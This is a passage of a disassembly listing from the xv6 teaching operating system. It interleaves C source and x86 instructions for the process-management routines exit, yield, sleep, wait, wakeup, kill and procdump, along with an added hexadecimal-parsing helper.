curproc->ofile[fd] = 0; 80103bef: c7 03 00 00 00 00 movl $0x0,(%ebx) 80103bf5: 83 c4 10 add $0x10,%esp 80103bf8: 83 c3 04 add $0x4,%ebx if(curproc == initproc) panic("init exiting"); // Close all open files. for(fd = 0; fd < NOFILE; fd++){ 80103bfb: 39 df cmp %ebx,%edi 80103bfd: 75 e1 jne 80103be0 <exit+0x30> fileclose(curproc->ofile[fd]); curproc->ofile[fd] = 0; } } begin_op(); 80103bff: e8 4c ef ff ff call 80102b50 <begin_op> iput(curproc->cwd); 80103c04: 83 ec 0c sub $0xc,%esp 80103c07: ff 76 68 pushl 0x68(%esi) 80103c0a: e8 91 db ff ff call 801017a0 <iput> end_op(); 80103c0f: e8 ac ef ff ff call 80102bc0 <end_op> curproc->cwd = 0; 80103c14: c7 46 68 00 00 00 00 movl $0x0,0x68(%esi) acquire(&ptable.lock); 80103c1b: c7 04 24 40 35 11 80 movl $0x80113540,(%esp) 80103c22: e8 f9 08 00 00 call 80104520 <acquire> // Parent might be sleeping in wait(). wakeup1(curproc->parent); 80103c27: 8b 56 14 mov 0x14(%esi),%edx 80103c2a: 83 c4 10 add $0x10,%esp static void wakeup1(void *chan) { struct proc *p; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++) 80103c2d: b8 74 35 11 80 mov $0x80113574,%eax 80103c32: eb 0e jmp 80103c42 <exit+0x92> 80103c34: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80103c38: 83 c0 7c add $0x7c,%eax 80103c3b: 3d 74 54 11 80 cmp $0x80115474,%eax 80103c40: 74 1c je 80103c5e <exit+0xae> if(p->state == SLEEPING && p->chan == chan) 80103c42: 83 78 0c 02 cmpl $0x2,0xc(%eax) 80103c46: 75 f0 jne 80103c38 <exit+0x88> 80103c48: 3b 50 20 cmp 0x20(%eax),%edx 80103c4b: 75 eb jne 80103c38 <exit+0x88> p->state = RUNNABLE; 80103c4d: c7 40 0c 03 00 00 00 movl $0x3,0xc(%eax) static void wakeup1(void *chan) { struct proc *p; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++) 80103c54: 83 c0 7c add $0x7c,%eax 80103c57: 3d 74 54 11 80 cmp $0x80115474,%eax 80103c5c: 75 e4 jne 80103c42 <exit+0x92> wakeup1(curproc->parent); // Pass abandoned children to init. for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ if(p->parent == curproc){ p->parent = initproc; 80103c5e: 8b 0d bc a5 10 80 mov 0x8010a5bc,%ecx 80103c64: ba 74 35 11 80 mov $0x80113574,%edx 80103c69: eb 10 jmp 80103c7b <exit+0xcb> 80103c6b: 90 nop 80103c6c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi // Parent might be sleeping in wait(). wakeup1(curproc->parent); // Pass abandoned children to init. for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103c70: 83 c2 7c add $0x7c,%edx 80103c73: 81 fa 74 54 11 80 cmp $0x80115474,%edx 80103c79: 74 33 je 80103cae <exit+0xfe> if(p->parent == curproc){ 80103c7b: 39 72 14 cmp %esi,0x14(%edx) 80103c7e: 75 f0 jne 80103c70 <exit+0xc0> p->parent = initproc; if(p->state == ZOMBIE) 80103c80: 83 7a 0c 05 cmpl $0x5,0xc(%edx) wakeup1(curproc->parent); // Pass abandoned children to init. for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ if(p->parent == curproc){ p->parent = initproc; 80103c84: 89 4a 14 mov %ecx,0x14(%edx) if(p->state == ZOMBIE) 80103c87: 75 e7 jne 80103c70 <exit+0xc0> 80103c89: b8 74 35 11 80 mov $0x80113574,%eax 80103c8e: eb 0a jmp 80103c9a <exit+0xea> static void wakeup1(void *chan) { struct proc *p; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++) 80103c90: 83 c0 7c add $0x7c,%eax 80103c93: 3d 74 54 11 80 cmp $0x80115474,%eax 80103c98: 74 d6 je 80103c70 <exit+0xc0> if(p->state == SLEEPING && p->chan == chan) 80103c9a: 83 78 0c 02 cmpl $0x2,0xc(%eax) 80103c9e: 75 f0 jne 80103c90 <exit+0xe0> 80103ca0: 3b 48 20 cmp 0x20(%eax),%ecx 80103ca3: 75 eb jne 80103c90 <exit+0xe0> p->state = RUNNABLE; 80103ca5: c7 40 0c 03 00 00 00 movl $0x3,0xc(%eax) 80103cac: eb e2 jmp 80103c90 <exit+0xe0> wakeup1(initproc); } } // Jump into the scheduler, never to return. curproc->state = ZOMBIE; 80103cae: c7 46 0c 05 00 00 00 movl $0x5,0xc(%esi) sched(); 80103cb5: e8 36 fe ff ff call 80103af0 <sched> panic("zombie exit"); 80103cba: 83 ec 0c sub $0xc,%esp 80103cbd: 68 7d 77 10 80 push $0x8010777d 80103cc2: e8 a9 c6 ff ff call 80100370 <panic> struct proc *curproc = myproc(); struct proc *p; int fd; if(curproc == initproc) panic("init exiting"); 80103cc7: 83 ec 0c sub $0xc,%esp 80103cca: 68 70 77 10 80 push $0x80107770 80103ccf: e8 9c c6 ff ff call 80100370 <panic> 80103cd4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80103cda: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80103ce0 <yield>: } // Give up the CPU for one scheduling round. void yield(void) { 80103ce0: 55 push %ebp 80103ce1: 89 e5 mov %esp,%ebp 80103ce3: 53 push %ebx 80103ce4: 83 ec 10 sub $0x10,%esp acquire(&ptable.lock); //DOC: yieldlock 80103ce7: 68 40 35 11 80 push $0x80113540 80103cec: e8 2f 08 00 00 call 80104520 <acquire> // while reading proc from the cpu structure struct proc* myproc(void) { struct cpu *c; struct proc *p; pushcli(); 80103cf1: e8 ea 07 00 00 call 801044e0 <pushcli> c = mycpu(); 80103cf6: e8 e5 f9 ff ff call 801036e0 <mycpu> p = c->proc; 80103cfb: 8b 98 ac 00 00 00 mov 0xac(%eax),%ebx popcli(); 80103d01: e8 ca 08 00 00 call 801045d0 <popcli> // Give up the CPU for one scheduling round. void yield(void) { acquire(&ptable.lock); //DOC: yieldlock myproc()->state = RUNNABLE; 80103d06: c7 43 0c 03 00 00 00 movl $0x3,0xc(%ebx) sched(); 80103d0d: e8 de fd ff ff call 80103af0 <sched> release(&ptable.lock); 80103d12: c7 04 24 40 35 11 80 movl $0x80113540,(%esp) 80103d19: e8 22 09 00 00 call 80104640 <release> } 80103d1e: 83 c4 10 add $0x10,%esp 80103d21: 8b 5d fc mov -0x4(%ebp),%ebx 80103d24: c9 leave 80103d25: c3 ret 80103d26: 8d 76 00 lea 0x0(%esi),%esi 80103d29: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80103d30 <sleep>: // Atomically release lock and sleep on chan. // Reacquires lock when awakened. void sleep(void *chan, struct spinlock *lk) { 80103d30: 55 push %ebp 80103d31: 89 e5 mov %esp,%ebp 80103d33: 57 push %edi 80103d34: 56 push %esi 80103d35: 53 push %ebx 80103d36: 83 ec 0c sub $0xc,%esp 80103d39: 8b 7d 08 mov 0x8(%ebp),%edi 80103d3c: 8b 75 0c mov 0xc(%ebp),%esi // while reading proc from the cpu structure struct proc* myproc(void) { struct cpu *c; struct proc *p; pushcli(); 80103d3f: e8 9c 07 00 00 call 801044e0 <pushcli> c = mycpu(); 80103d44: e8 97 f9 ff ff call 801036e0 <mycpu> p = c->proc; 80103d49: 8b 98 ac 00 00 00 mov 0xac(%eax),%ebx popcli(); 80103d4f: e8 7c 08 00 00 call 801045d0 <popcli> void sleep(void *chan, struct spinlock *lk) { struct proc *p = myproc(); if(p == 0) 80103d54: 85 db test %ebx,%ebx 80103d56: 0f 84 87 00 00 00 je 80103de3 <sleep+0xb3> panic("sleep"); if(lk == 0) 80103d5c: 85 f6 test %esi,%esi 80103d5e: 74 76 je 80103dd6 <sleep+0xa6> // change p->state and then call sched. // Once we hold ptable.lock, we can be // guaranteed that we won't miss any wakeup // (wakeup runs with ptable.lock locked), // so it's okay to release lk. if(lk != &ptable.lock){ //DOC: sleeplock0 80103d60: 81 fe 40 35 11 80 cmp $0x80113540,%esi 80103d66: 74 50 je 80103db8 <sleep+0x88> acquire(&ptable.lock); //DOC: sleeplock1 80103d68: 83 ec 0c sub $0xc,%esp 80103d6b: 68 40 35 11 80 push $0x80113540 80103d70: e8 ab 07 00 00 call 80104520 <acquire> release(lk); 80103d75: 89 34 24 mov %esi,(%esp) 80103d78: e8 c3 08 00 00 call 80104640 <release> } // Go to sleep. p->chan = chan; 80103d7d: 89 7b 20 mov %edi,0x20(%ebx) p->state = SLEEPING; 80103d80: c7 43 0c 02 00 00 00 movl $0x2,0xc(%ebx) sched(); 80103d87: e8 64 fd ff ff call 80103af0 <sched> // Tidy up. p->chan = 0; 80103d8c: c7 43 20 00 00 00 00 movl $0x0,0x20(%ebx) // Reacquire original lock. if(lk != &ptable.lock){ //DOC: sleeplock2 release(&ptable.lock); 80103d93: c7 04 24 40 35 11 80 movl $0x80113540,(%esp) 80103d9a: e8 a1 08 00 00 call 80104640 <release> acquire(lk); 80103d9f: 89 75 08 mov %esi,0x8(%ebp) 80103da2: 83 c4 10 add $0x10,%esp } } 80103da5: 8d 65 f4 lea -0xc(%ebp),%esp 80103da8: 5b pop %ebx 80103da9: 5e pop %esi 80103daa: 5f pop %edi 80103dab: 5d pop %ebp p->chan = 0; // Reacquire original lock. if(lk != &ptable.lock){ //DOC: sleeplock2 release(&ptable.lock); acquire(lk); 80103dac: e9 6f 07 00 00 jmp 80104520 <acquire> 80103db1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi if(lk != &ptable.lock){ //DOC: sleeplock0 acquire(&ptable.lock); //DOC: sleeplock1 release(lk); } // Go to sleep. p->chan = chan; 80103db8: 89 7b 20 mov %edi,0x20(%ebx) p->state = SLEEPING; 80103dbb: c7 43 0c 02 00 00 00 movl $0x2,0xc(%ebx) sched(); 80103dc2: e8 29 fd ff ff call 80103af0 <sched> // Tidy up. p->chan = 0; 80103dc7: c7 43 20 00 00 00 00 movl $0x0,0x20(%ebx) // Reacquire original lock. if(lk != &ptable.lock){ //DOC: sleeplock2 release(&ptable.lock); acquire(lk); } } 80103dce: 8d 65 f4 lea -0xc(%ebp),%esp 80103dd1: 5b pop %ebx 80103dd2: 5e pop %esi 80103dd3: 5f pop %edi 80103dd4: 5d pop %ebp 80103dd5: c3 ret if(p == 0) panic("sleep"); if(lk == 0) panic("sleep without lk"); 80103dd6: 83 ec 0c sub $0xc,%esp 80103dd9: 68 8f 77 10 80 push $0x8010778f 80103dde: e8 8d c5 ff ff call 80100370 <panic> sleep(void *chan, struct spinlock *lk) { struct proc *p = myproc(); if(p == 0) panic("sleep"); 80103de3: 83 ec 0c sub $0xc,%esp 80103de6: 68 89 77 10 80 push $0x80107789 80103deb: e8 80 c5 ff ff call 80100370 <panic> 80103df0 <wait>: // Wait for a child process to exit and return its pid. // Return -1 if this process has no children. int wait(void) { 80103df0: 55 push %ebp 80103df1: 89 e5 mov %esp,%ebp 80103df3: 56 push %esi 80103df4: 53 push %ebx // while reading proc from the cpu structure struct proc* myproc(void) { struct cpu *c; struct proc *p; pushcli(); 80103df5: e8 e6 06 00 00 call 801044e0 <pushcli> c = mycpu(); 80103dfa: e8 e1 f8 ff ff call 801036e0 <mycpu> p = c->proc; 80103dff: 8b b0 ac 00 00 00 mov 0xac(%eax),%esi popcli(); 80103e05: e8 c6 07 00 00 call 801045d0 <popcli> { struct proc *p; int havekids, pid; struct proc *curproc = myproc(); acquire(&ptable.lock); 80103e0a: 83 ec 0c sub $0xc,%esp 80103e0d: 68 40 35 11 80 push $0x80113540 80103e12: e8 09 07 00 00 call 80104520 <acquire> 80103e17: 83 c4 10 add $0x10,%esp for(;;){ // Scan through table looking for exited children. havekids = 0; 80103e1a: 31 c0 xor %eax,%eax for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103e1c: bb 74 35 11 80 mov $0x80113574,%ebx 80103e21: eb 10 jmp 80103e33 <wait+0x43> 80103e23: 90 nop 80103e24: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80103e28: 83 c3 7c add $0x7c,%ebx 80103e2b: 81 fb 74 54 11 80 cmp $0x80115474,%ebx 80103e31: 74 1d je 80103e50 <wait+0x60> if(p->parent != curproc) 80103e33: 39 73 14 cmp %esi,0x14(%ebx) 80103e36: 75 f0 jne 80103e28 <wait+0x38> continue; havekids = 1; if(p->state == ZOMBIE){ 80103e38: 83 7b 0c 05 cmpl $0x5,0xc(%ebx) 80103e3c: 74 30 je 80103e6e <wait+0x7e> acquire(&ptable.lock); for(;;){ // Scan through table looking for exited children. havekids = 0; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103e3e: 83 c3 7c add $0x7c,%ebx if(p->parent != curproc) continue; havekids = 1; 80103e41: b8 01 00 00 00 mov $0x1,%eax acquire(&ptable.lock); for(;;){ // Scan through table looking for exited children. havekids = 0; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103e46: 81 fb 74 54 11 80 cmp $0x80115474,%ebx 80103e4c: 75 e5 jne 80103e33 <wait+0x43> 80103e4e: 66 90 xchg %ax,%ax return pid; } } // No point waiting if we don't have any children. if(!havekids || curproc->killed){ 80103e50: 85 c0 test %eax,%eax 80103e52: 74 70 je 80103ec4 <wait+0xd4> 80103e54: 8b 46 24 mov 0x24(%esi),%eax 80103e57: 85 c0 test %eax,%eax 80103e59: 75 69 jne 80103ec4 <wait+0xd4> release(&ptable.lock); return -1; } // Wait for children to exit. (See wakeup1 call in proc_exit.) sleep(curproc, &ptable.lock); //DOC: wait-sleep 80103e5b: 83 ec 08 sub $0x8,%esp 80103e5e: 68 40 35 11 80 push $0x80113540 80103e63: 56 push %esi 80103e64: e8 c7 fe ff ff call 80103d30 <sleep> } 80103e69: 83 c4 10 add $0x10,%esp 80103e6c: eb ac jmp 80103e1a <wait+0x2a> continue; havekids = 1; if(p->state == ZOMBIE){ // Found one. pid = p->pid; kfree(p->kstack); 80103e6e: 83 ec 0c sub $0xc,%esp 80103e71: ff 73 08 pushl 0x8(%ebx) if(p->parent != curproc) continue; havekids = 1; if(p->state == ZOMBIE){ // Found one. pid = p->pid; 80103e74: 8b 73 10 mov 0x10(%ebx),%esi kfree(p->kstack); 80103e77: e8 64 e4 ff ff call 801022e0 <kfree> p->kstack = 0; freevm(p->pgdir); 80103e7c: 5a pop %edx 80103e7d: ff 73 04 pushl 0x4(%ebx) havekids = 1; if(p->state == ZOMBIE){ // Found one. pid = p->pid; kfree(p->kstack); p->kstack = 0; 80103e80: c7 43 08 00 00 00 00 movl $0x0,0x8(%ebx) freevm(p->pgdir); 80103e87: e8 e4 2f 00 00 call 80106e70 <freevm> p->pid = 0; 80103e8c: c7 43 10 00 00 00 00 movl $0x0,0x10(%ebx) p->parent = 0; 80103e93: c7 43 14 00 00 00 00 movl $0x0,0x14(%ebx) p->name[0] = 0; 80103e9a: c6 43 6c 00 movb $0x0,0x6c(%ebx) p->killed = 0; 80103e9e: c7 43 24 00 00 00 00 movl $0x0,0x24(%ebx) p->state = UNUSED; 80103ea5: c7 43 0c 00 00 00 00 movl $0x0,0xc(%ebx) release(&ptable.lock); 80103eac: c7 04 24 40 35 11 80 movl $0x80113540,(%esp) 80103eb3: e8 88 07 00 00 call 80104640 <release> return pid; 80103eb8: 83 c4 10 add $0x10,%esp } // Wait for children to exit. (See wakeup1 call in proc_exit.) sleep(curproc, &ptable.lock); //DOC: wait-sleep } } 80103ebb: 8d 65 f8 lea -0x8(%ebp),%esp p->parent = 0; p->name[0] = 0; p->killed = 0; p->state = UNUSED; release(&ptable.lock); return pid; 80103ebe: 89 f0 mov %esi,%eax } // Wait for children to exit. (See wakeup1 call in proc_exit.) sleep(curproc, &ptable.lock); //DOC: wait-sleep } } 80103ec0: 5b pop %ebx 80103ec1: 5e pop %esi 80103ec2: 5d pop %ebp 80103ec3: c3 ret } } // No point waiting if we don't have any children. if(!havekids || curproc->killed){ release(&ptable.lock); 80103ec4: 83 ec 0c sub $0xc,%esp 80103ec7: 68 40 35 11 80 push $0x80113540 80103ecc: e8 6f 07 00 00 call 80104640 <release> return -1; 80103ed1: 83 c4 10 add $0x10,%esp } // Wait for children to exit. (See wakeup1 call in proc_exit.) sleep(curproc, &ptable.lock); //DOC: wait-sleep } } 80103ed4: 8d 65 f8 lea -0x8(%ebp),%esp } // No point waiting if we don't have any children. if(!havekids || curproc->killed){ release(&ptable.lock); return -1; 80103ed7: b8 ff ff ff ff mov $0xffffffff,%eax } // Wait for children to exit. (See wakeup1 call in proc_exit.) sleep(curproc, &ptable.lock); //DOC: wait-sleep } } 80103edc: 5b pop %ebx 80103edd: 5e pop %esi 80103ede: 5d pop %ebp 80103edf: c3 ret 80103ee0 <wakeup>: } // Wake up all processes sleeping on chan. void wakeup(void *chan) { 80103ee0: 55 push %ebp 80103ee1: 89 e5 mov %esp,%ebp 80103ee3: 53 push %ebx 80103ee4: 83 ec 10 sub $0x10,%esp 80103ee7: 8b 5d 08 mov 0x8(%ebp),%ebx acquire(&ptable.lock); 80103eea: 68 40 35 11 80 push $0x80113540 80103eef: e8 2c 06 00 00 call 80104520 <acquire> 80103ef4: 83 c4 10 add $0x10,%esp static void wakeup1(void *chan) { struct proc *p; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++) 80103ef7: b8 74 35 11 80 mov $0x80113574,%eax 80103efc: eb 0c jmp 80103f0a <wakeup+0x2a> 80103efe: 66 90 xchg %ax,%ax 80103f00: 83 c0 7c add $0x7c,%eax 80103f03: 3d 74 54 11 80 cmp $0x80115474,%eax 80103f08: 74 1c je 80103f26 <wakeup+0x46> if(p->state == SLEEPING && p->chan == chan) 80103f0a: 83 78 0c 02 cmpl $0x2,0xc(%eax) 80103f0e: 75 f0 jne 80103f00 <wakeup+0x20> 80103f10: 3b 58 20 cmp 0x20(%eax),%ebx 80103f13: 75 eb jne 80103f00 <wakeup+0x20> p->state = RUNNABLE; 80103f15: c7 40 0c 03 00 00 00 movl $0x3,0xc(%eax) static void wakeup1(void *chan) { struct proc *p; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++) 80103f1c: 83 c0 7c add $0x7c,%eax 80103f1f: 3d 74 54 11 80 cmp $0x80115474,%eax 80103f24: 75 e4 jne 80103f0a <wakeup+0x2a> void wakeup(void *chan) { acquire(&ptable.lock); wakeup1(chan); release(&ptable.lock); 80103f26: c7 45 08 40 35 11 80 movl $0x80113540,0x8(%ebp) } 80103f2d: 8b 5d fc mov -0x4(%ebp),%ebx 80103f30: c9 leave void wakeup(void *chan) { acquire(&ptable.lock); wakeup1(chan); release(&ptable.lock); 80103f31: e9 0a 07 00 00 jmp 80104640 <release> 80103f36: 8d 76 00 lea 0x0(%esi),%esi 80103f39: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80103f40 <kill>: // Kill the process with the given pid. // Process won't exit until it returns // to user space (see trap in trap.c). int kill(int pid) { 80103f40: 55 push %ebp 80103f41: 89 e5 mov %esp,%ebp 80103f43: 53 push %ebx 80103f44: 83 ec 10 sub $0x10,%esp 80103f47: 8b 5d 08 mov 0x8(%ebp),%ebx struct proc *p; acquire(&ptable.lock); 80103f4a: 68 40 35 11 80 push $0x80113540 80103f4f: e8 cc 05 00 00 call 80104520 <acquire> 80103f54: 83 c4 10 add $0x10,%esp for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103f57: b8 74 35 11 80 mov $0x80113574,%eax 80103f5c: eb 0c jmp 80103f6a <kill+0x2a> 80103f5e: 66 90 xchg %ax,%ax 80103f60: 83 c0 7c add $0x7c,%eax 80103f63: 3d 74 54 11 80 cmp $0x80115474,%eax 80103f68: 74 3e je 80103fa8 <kill+0x68> if(p->pid == pid){ 80103f6a: 39 58 10 cmp %ebx,0x10(%eax) 80103f6d: 75 f1 jne 80103f60 <kill+0x20> p->killed = 1; // Wake process from sleep if necessary. if(p->state == SLEEPING) 80103f6f: 83 78 0c 02 cmpl $0x2,0xc(%eax) struct proc *p; acquire(&ptable.lock); for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ if(p->pid == pid){ p->killed = 1; 80103f73: c7 40 24 01 00 00 00 movl $0x1,0x24(%eax) // Wake process from sleep if necessary. if(p->state == SLEEPING) 80103f7a: 74 1c je 80103f98 <kill+0x58> p->state = RUNNABLE; release(&ptable.lock); 80103f7c: 83 ec 0c sub $0xc,%esp 80103f7f: 68 40 35 11 80 push $0x80113540 80103f84: e8 b7 06 00 00 call 80104640 <release> return 0; 80103f89: 83 c4 10 add $0x10,%esp 80103f8c: 31 c0 xor %eax,%eax } } release(&ptable.lock); return -1; } 80103f8e: 8b 5d fc mov -0x4(%ebp),%ebx 80103f91: c9 leave 80103f92: c3 ret 80103f93: 90 nop 80103f94: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ if(p->pid == pid){ p->killed = 1; // Wake process from sleep if necessary. if(p->state == SLEEPING) p->state = RUNNABLE; 80103f98: c7 40 0c 03 00 00 00 movl $0x3,0xc(%eax) 80103f9f: eb db jmp 80103f7c <kill+0x3c> 80103fa1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi release(&ptable.lock); return 0; } } release(&ptable.lock); 80103fa8: 83 ec 0c sub $0xc,%esp 80103fab: 68 40 35 11 80 push $0x80113540 80103fb0: e8 8b 06 00 00 call 80104640 <release> return -1; 80103fb5: 83 c4 10 add $0x10,%esp 80103fb8: b8 ff ff ff ff mov $0xffffffff,%eax } 80103fbd: 8b 5d fc mov -0x4(%ebp),%ebx 80103fc0: c9 leave 80103fc1: c3 ret 80103fc2: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80103fc9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80103fd0 <procdump>: // Print a process listing to console. For debugging. // Runs when user types ^P on console. // No lock to avoid wedging a stuck machine further. void procdump(void) { 80103fd0: 55 push %ebp 80103fd1: 89 e5 mov %esp,%ebp 80103fd3: 57 push %edi 80103fd4: 56 push %esi 80103fd5: 53 push %ebx 80103fd6: 8d 75 e8 lea -0x18(%ebp),%esi 80103fd9: bb e0 35 11 80 mov $0x801135e0,%ebx 80103fde: 83 ec 3c sub $0x3c,%esp 80103fe1: eb 24 jmp 80104007 <procdump+0x37> 80103fe3: 90 nop 80103fe4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if(p->state == SLEEPING){ getcallerpcs((uint*)p->context->ebp+2, pc); for(i=0; i<10 && pc[i] != 0; i++) cprintf(" %p", pc[i]); } cprintf("\n"); 80103fe8: 83 ec 0c sub $0xc,%esp 80103feb: 68 1b 7c 10 80 push $0x80107c1b 80103ff0: e8 6b c6 ff ff call 80100660 <cprintf> 80103ff5: 83 c4 10 add $0x10,%esp 80103ff8: 83 c3 7c add $0x7c,%ebx int i; struct proc *p; char *state; uint pc[10]; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103ffb: 81 fb e0 54 11 80 cmp $0x801154e0,%ebx 80104001: 0f 84 81 00 00 00 je 80104088 <procdump+0xb8> if(p->state == UNUSED) 80104007: 8b 43 a0 mov -0x60(%ebx),%eax 8010400a: 85 c0 test %eax,%eax 8010400c: 74 ea je 80103ff8 <procdump+0x28> continue; if(p->state >= 0 && p->state < NELEM(states) && states[p->state]) 8010400e: 83 f8 05 cmp $0x5,%eax state = states[p->state]; else state = "???"; 80104011: ba a0 77 10 80 mov $0x801077a0,%edx uint pc[10]; for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ if(p->state == UNUSED) continue; if(p->state >= 0 && p->state < NELEM(states) && states[p->state]) 80104016: 77 11 ja 80104029 <procdump+0x59> 80104018: 8b 14 85 0c 79 10 80 mov -0x7fef86f4(,%eax,4),%edx state = states[p->state]; else state = "???"; 8010401f: b8 a0 77 10 80 mov $0x801077a0,%eax 80104024: 85 d2 test %edx,%edx 80104026: 0f 44 d0 cmove %eax,%edx cprintf("%d %s %s", p->pid, state, p->name); 80104029: 53 push %ebx 8010402a: 52 push %edx 8010402b: ff 73 a4 pushl -0x5c(%ebx) 8010402e: 68 a4 77 10 80 push $0x801077a4 80104033: e8 28 c6 ff ff call 80100660 <cprintf> if(p->state == SLEEPING){ 80104038: 83 c4 10 add $0x10,%esp 8010403b: 83 7b a0 02 cmpl $0x2,-0x60(%ebx) 8010403f: 75 a7 jne 80103fe8 <procdump+0x18> getcallerpcs((uint*)p->context->ebp+2, pc); 80104041: 8d 45 c0 lea -0x40(%ebp),%eax 80104044: 83 ec 08 sub $0x8,%esp 80104047: 8d 7d c0 lea -0x40(%ebp),%edi 8010404a: 50 push %eax 8010404b: 8b 43 b0 mov -0x50(%ebx),%eax 8010404e: 8b 40 0c mov 0xc(%eax),%eax 80104051: 83 c0 08 add $0x8,%eax 80104054: 50 push %eax 80104055: e8 e6 03 00 00 call 80104440 <getcallerpcs> 8010405a: 83 c4 10 add $0x10,%esp 8010405d: 8d 76 00 lea 0x0(%esi),%esi for(i=0; i<10 && pc[i] != 0; i++) 80104060: 8b 17 mov (%edi),%edx 80104062: 85 d2 test %edx,%edx 80104064: 74 82 je 80103fe8 <procdump+0x18> cprintf(" %p", pc[i]); 80104066: 83 ec 08 sub $0x8,%esp 80104069: 83 c7 04 add $0x4,%edi 8010406c: 52 push %edx 8010406d: 68 e1 71 10 80 push $0x801071e1 80104072: e8 e9 c5 ff ff call 80100660 <cprintf> else state = "???"; cprintf("%d %s %s", p->pid, state, p->name); if(p->state == SLEEPING){ getcallerpcs((uint*)p->context->ebp+2, pc); for(i=0; i<10 && pc[i] != 0; i++) 80104077: 83 c4 10 add $0x10,%esp 8010407a: 39 f7 cmp %esi,%edi 8010407c: 75 e2 jne 80104060 <procdump+0x90> 8010407e: e9 65 ff ff ff jmp 80103fe8 <procdump+0x18> 80104083: 90 nop 80104084: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi cprintf(" %p", pc[i]); } cprintf("\n"); } } 80104088: 8d 65 f4 lea -0xc(%ebp),%esp 8010408b: 5b pop %ebx 8010408c: 5e pop %esi 8010408d: 5f pop %edi 8010408e: 5d pop %ebp 8010408f: c3 ret 80104090 <atoi_hexa>: uint atoi_hexa(char *buf, int start){ 80104090: 55 push %ebp uint res = 0; // Stores the final result int i = start ; for(; buf[i] != '\0' ; i++){ 80104091: 31 c0 xor %eax,%eax } cprintf("\n"); } } uint atoi_hexa(char *buf, int start){ 80104093: 89 e5 mov %esp,%ebp 80104095: 53 push %ebx uint res = 0; // Stores the final result int i = start ; for(; buf[i] != '\0' ; i++){ 80104096: 8b 4d 0c mov 0xc(%ebp),%ecx 80104099: 03 4d 08 add 0x8(%ebp),%ecx 8010409c: 0f be 11 movsbl (%ecx),%edx 8010409f: 84 d2 test %dl,%dl 801040a1: 75 17 jne 801040ba <atoi_hexa+0x2a> 801040a3: eb 47 jmp 801040ec <atoi_hexa+0x5c> 801040a5: 8d 76 00 lea 0x0(%esi),%esi //cprintf("hi---"); uint temp = 0 ; if(buf[i] - '0' >= 0 && buf[i] - '0' <= 9) temp = buf[i] - '0' ; 801040a8: 83 ea 30 sub $0x30,%edx case 'f' : temp = 15 ; break ; default : return res ; } } res = res*16 + temp ; 801040ab: c1 e0 04 shl $0x4,%eax 801040ae: 83 c1 01 add $0x1,%ecx 801040b1: 01 d0 add %edx,%eax uint atoi_hexa(char *buf, int start){ uint res = 0; // Stores the final result int i = start ; for(; buf[i] != '\0' ; i++){ 801040b3: 0f be 11 movsbl (%ecx),%edx 801040b6: 84 d2 test %dl,%dl 801040b8: 74 32 je 801040ec <atoi_hexa+0x5c> //cprintf("hi---"); uint temp = 0 ; if(buf[i] - '0' >= 0 && buf[i] - '0' <= 9) 801040ba: 8d 5a d0 lea -0x30(%edx),%ebx 801040bd: 80 fb 09 cmp $0x9,%bl 801040c0: 76 e6 jbe 801040a8 <atoi_hexa+0x18> temp = buf[i] - '0' ; else{ switch(buf[i]){ 801040c2: 83 ea 41 sub $0x41,%edx 801040c5: 80 fa 25 cmp $0x25,%dl 801040c8: 77 22 ja 801040ec <atoi_hexa+0x5c> 801040ca: 0f b6 d2 movzbl %dl,%edx 801040cd: ff 24 95 74 78 10 80 jmp *-0x7fef878c(,%edx,4) 801040d4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 'A' : case 'a' : temp = 10 ; 801040d8: ba 0a 00 00 00 mov $0xa,%edx case 'f' : temp = 15 ; break ; default : return res ; } } res = res*16 + temp ; 801040dd: c1 e0 04 shl $0x4,%eax 801040e0: 83 c1 01 add $0x1,%ecx 801040e3: 01 d0 add %edx,%eax uint atoi_hexa(char *buf, int start){ uint res = 0; // Stores the final result int i = start ; for(; buf[i] != '\0' ; i++){ 801040e5: 0f be 11 movsbl (%ecx),%edx 801040e8: 84 d2 test %dl,%dl 801040ea: 75 ce jne 801040ba <atoi_hexa+0x2a> } res = res*16 + temp ; } //cprintf("HEX : %x\n",res); return res ; } 801040ec: 5b pop %ebx 801040ed: 5d pop %ebp 801040ee: c3 ret 801040ef: 90 nop break ; case 'E' : case 'e' : temp = 14 ; break ; case 'F' : case 'f' : temp = 15 ; 801040f0: ba 0f 00 00 00 mov $0xf,%edx break ; 801040f5: eb b4 jmp 801040ab <atoi_hexa+0x1b> 801040f7: 89 f6 mov %esi,%esi 801040f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi break ; case 'D' : case 'd' : temp = 13 ; break ; case 'E' : case 'e' : temp = 14 ; 80104100: ba 0e 00 00 00 mov $0xe,%edx break ; 80104105: eb a4 jmp 801040ab <atoi_hexa+0x1b> 80104107: 89 f6 mov %esi,%esi 